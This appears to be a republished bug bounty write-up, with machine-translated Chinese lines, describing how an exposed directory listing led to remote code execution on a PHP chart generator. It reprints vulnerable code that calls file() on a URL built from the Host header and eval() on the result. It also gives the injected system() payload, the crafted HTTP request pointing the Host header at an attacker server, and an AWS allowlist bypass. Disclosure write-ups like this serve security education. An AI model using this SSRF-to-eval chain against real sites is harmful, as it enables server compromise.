Directory Listing to RCE

渗透技巧 1个月前 admin
151 0 0

Directory Listing to RCE (?!)
RCE 的目录列表 (?!

Hello World 🙂 你好世界:)

Here is a little Write-Up i decided to do. It’s on a vulnerability i discovered not long ago on BugBounty, i hope you will like it !

Starting from the bottom

I started by looking at a website who was not looking really big and, after looking passively (following links, digging JS files, …)

i didn’t found anything really interesting on it.

I then decided to use one of my favorite tools: FFUF 🙂
然后我决定使用我最喜欢的工具之一:FFUF 🙂

Every time i use it, i start with the one4all_micro wordlist. This time, it didn’t returned me a lot of interesting things except a php directory.
每次使用它时,我都会从 one4all_micro 单词列表开始。这一次,除了目录 php 之外,它没有返回我很多有趣的东西。

When i wanted to check this dir, i was thinking that i will get a 403 but, surprisingly, the directory listing was enabled on this folder…
当我想检查这个目录时,我想我会得到一个 403,但令人惊讶的是,在这个文件夹上启用了目录列表......

Directory Listing to RCE

Source Code ? 源代码 ?

Only 6 files were inside the folder (including copies like .php.old et .php.old_jul). Looking closer, one of the file got my attention.
文件夹中只有 6 个文件(包括像 et .php.old_jul 这样的 .php.old 副本)。仔细一看,其中一个文件引起了我的注意。

It was named gen.php and, it could be directly called (the other one only contained functions). When i wanted to acces the file, i got a 500 Error.
它被命名 gen.php ,可以直接调用(另一个只包含函数)。当我想访问该文件时,我收到 500 错误。

So i looked at the file gen.php.old_jul and, after looking through it, i took this code snippet:
所以我看了一下文件 gen.php.old_jul ,看完之后,我拿了这个代码片段:

if(getenv("REQUEST_METHOD") == "GET")
    if($_SERVER["HTTPS"] == "on" ) $protocol = "https";
    else $protocol = "http";

    $arrcont = file($protocol."://".getenv("HTTP_HOST")."/".$_GET["name"]."/dir/file?id=".$_GET["id"]);

    foreach($arrcont as $arr)
        if(substr($arr,1,11) == "chartvalues") eval($arr);

    $chartvalues = setScaling($chartvalues);
      tLogger($LOGFILENAME,"------ REQUEST --------\n");
      tLogger($LOGFILENAME,"TIME=".date("d-m-Y H:i:s")."\nSID=".$_GET["id"]."\n");
      tLogger($LOGFILENAME,"------ CHARTVALUES ------\n");
      foreach($chartvalues as $chartname => $chartvalue) tLogger($LOGFILENAME,$chartname."=".$chartvalue."\n");

    if($chartvalues["yMax"] == "0") MakeEmptyImage($chartvalues);
    //if($chartvalues["yMin"] == "0") MakeEmptyImage($chartvalues);
    if($chartvalues["type"] == "linechart") MakeLinePointChart($chartvalues);
    if($chartvalues["type"] == "barchart") MakeBarChart($chartvalues);
    else MakeEmptyImage($chartvalues);


What i wanted to use here was the first part:

if($_SERVER["HTTPS"] == "on" ) $protocol = "https";
else $protocol = "http";

$arrcont = file($protocol."://".getenv("HTTP_HOST")."/".$_GET["name"]."/dir/file?id=".$_GET["id"]);

foreach($arrcont as $arr)
	if(substr($arr,1,11) == "chartvalues") eval($arr);

As we can see, there are multiple bad things here:

  • They are using getenv("HTTP_HOST") on a file() function.
    他们正在使用 getenv("HTTP_HOST") 一个 file() 函数。
  • The $_GET["wsname"] 这 $_GET["wsname"]
  • And, obviously, the eval() if the string chartvalues is found in the array.
    而且,很明显, eval() 如果在数组中找到字符串 chartvalues 。

From here, we know that it’s possible to play with the file(). However, as i said before, there was nothing interesting on the site (no way to upload a file) Fortunately, the use of getenv("HTTP_HOST") and, the fact that the application don’t check the Host header, it was possible to do a Server-Side Request Forgery (SSRF).
从这里,我们知道可以使用. file() 但是,正如我之前所说,网站上没有什么有趣的东西(无法上传文件)幸运的是,使用 getenv("HTTP_HOST") and 应用程序不检查 Host 标头的事实,可以做一个 Server-Side Request Forgery (SSRF) .

The Exploitation 剥削

I then started by modifying my Host header and insert a collaborator. I successfully received a HTTP Request on it.
然后,我首先修改了标题 Host 并插入了一个协作者。我成功收到了一个HTTP请求。

Directory Listing to RCE

Knowing this, i created a file on my server containing this in order to confirm it was possible to exploit the vulnerability to do a Remote Code Execution"chartvalues";system("echo 'RCE :)\n';cat /etc/os-release");
知道这一点后,我在服务器上创建了一个包含此内容的文件,以确认可以利用该漏洞执行以下操作 Remote Code Execution : "chartvalues";system("echo 'RCE :)\n';cat /etc/os-release");

Here is how i crafted my request:

GET /gen.php?wsname=exploitrce.txt%3f HTTP/1.1
Host: kuromatae.tld
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1

To my surprise, it didn’t work… I didn’t even received a request on my server. I started to look as why i didn’t received anything and, i discovered that only the AWS IPs were whitelist !
令我惊讶的是,它没有用...我什至没有在我的服务器上收到请求。我开始寻找为什么我没有收到任何东西,我发现只有 AWS IP 是白名单!

Then i booted an EC2 with a let’s encrypt certificate and, after trying again, it worked 🙂
然后我用让我们加密的证书启动了一个 EC2,再次尝试后,它工作:)

Directory Listing to RCE

The End 结束

I wanted to show you that, starting with nothing much, we can discover a Remote Code Execution on a website which looked totally empty at the beginning !
我想向您展示,从什么都没有开始,我们可以在一个一开始看起来完全空洞的网站上发现一个 Remote Code Execution !


原文始发于Kuromatae:Directory Listing to RCE

版权声明:admin 发表于 2023年10月18日 上午8:30。
转载请注明:Directory Listing to RCE | CTF导航